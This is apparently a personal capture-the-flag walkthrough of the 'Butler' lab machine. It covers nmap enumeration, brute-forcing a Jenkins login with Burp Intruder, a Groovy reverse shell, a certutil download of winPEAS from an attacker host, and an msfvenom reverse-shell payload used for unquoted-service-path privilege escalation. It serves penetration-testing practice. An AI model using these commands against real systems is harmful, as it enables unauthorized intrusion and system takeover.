Butler box — Walkthrough
Hi guys, it been a long time since my last write-up. I will be starting it again and I hope I can continue further!
This is also a starting point of my journey to OSCP! Wish me luck!
So, today I would like to work on Butler machine which is a machine many of you knew already. But, it is a start for me! Let’s get started!
###############################################################
Some people might face some issue while finding your boxes on kali (or whatever distro you using) you can try the step below on Oracle VM:
- Press on Tools.
- Press NAT Networks and press create.
- Press apply below. The IPv4 usually work fine by default.
- Then choose “nat network” on the network field.
Disclaimer: It works fine for me on some boxes but other still unable to find. Yet, worth a try.
###############################################################
Enumeration
Firstly you can check your IP on your attacker machine.
Then, to locate the butler box:
As you can see there is a 10.0.2.80 found. Let’s ping it.
Now, Nmap scans the machine. I usually use -oN to save the results into a text file, as we do not want to re-run and wait again right if we accidentally lost it.
nmap VICTIM_IP -sV -T4 -p- -A -oN <file_name>
Port 8080
Once we browse it, we can see as below (Welcome to Jenkins! — yes I am welcomed):
Tried admin:admin, it failed. Who knows right?
I do find some interesting exploit while searching “Jetty 9” using searchsploit, but not sure are we gonna be using it later.
But after checking on the possible exploits, I cant find a single that suit this scenario (I might miss something or I did really missed something). So, maybe try bruteforce it works?
So, I launched Burp and send it to intruder. I will be using cluster bomb since I have no idea on the username and the password. Remember to add §§ to the field you wanted to “bomb” it.
For the list, I would try some default passwords and usernames first before going BIG like rockyou.txt. And some Google search gets me this.
So, maybe Jenkins and admin? Lets try.
Ok, failed. But let’s try other variations of it.
And we get it.
Now log in.
Usually for Jenkins, I will go for Script Console which is located at the bottom of the page when you press the “Manage Jenkins”.
Get Reverse shell for Groovy, as it stated Groovy Script.
Paste it on the console. Remember to run your Netcat on your attacker machine before running the script.
Voila! We get it!
Find Something Useful?
Now we have access as jenkins.
Get winpeas.exe from our machine to the victim machine. First set up a simple http server on your attacker machine.
python3 -m http.server <PORT>
Then on the victim side, download the winpeas.exe.
certutil -urlcache -f http://<ATTACKER_IP>:<PORT>/winPEASany.exe winpeas.exe
Then, run winpeas.exe and wait for results.
After a long wait, we have our results. Then another 30 minutes scrolling through the results and checking all lines that is highlighted in red. I saw one thing that might be useful.
It stated No quotes and Space detected. This will be what we called “Unquoted Service Path”. It is like the machine will try to run each and every “path” with “.exe” until it find one along the path. Therefore, we can place a exe file on the path to let the system trigger our payload. For more information on Unquoted Service Path , you can go to HackTricks to read it.
Link to Hack Tricks: https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#unquoted-service-paths
ROAD TO ADMIN!
Create our payload using MSFVENOM.
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<ATTACKER_IP> LPORT=<PORT> -f exe -o Wise.exe
Download it and put it on the “path”.
Then check it using sc qc.
We will need to restart it manually to trigger our payload. But remember to set up a listener!
Once we start it back, we receive a connection and it is nt authority\system!
We rooted the system!
Thank you for reading my write-up. I would like to improve my write-up skills in the future and can reach me through Twitter or comments. Any sponsors also welcomed.
Twitter: https://twitter.com/curse_jk
Buy me coffee:http://buymeacoffee.com/Cursemagic
Other medium write-ups: https://cursemagic.medium.com
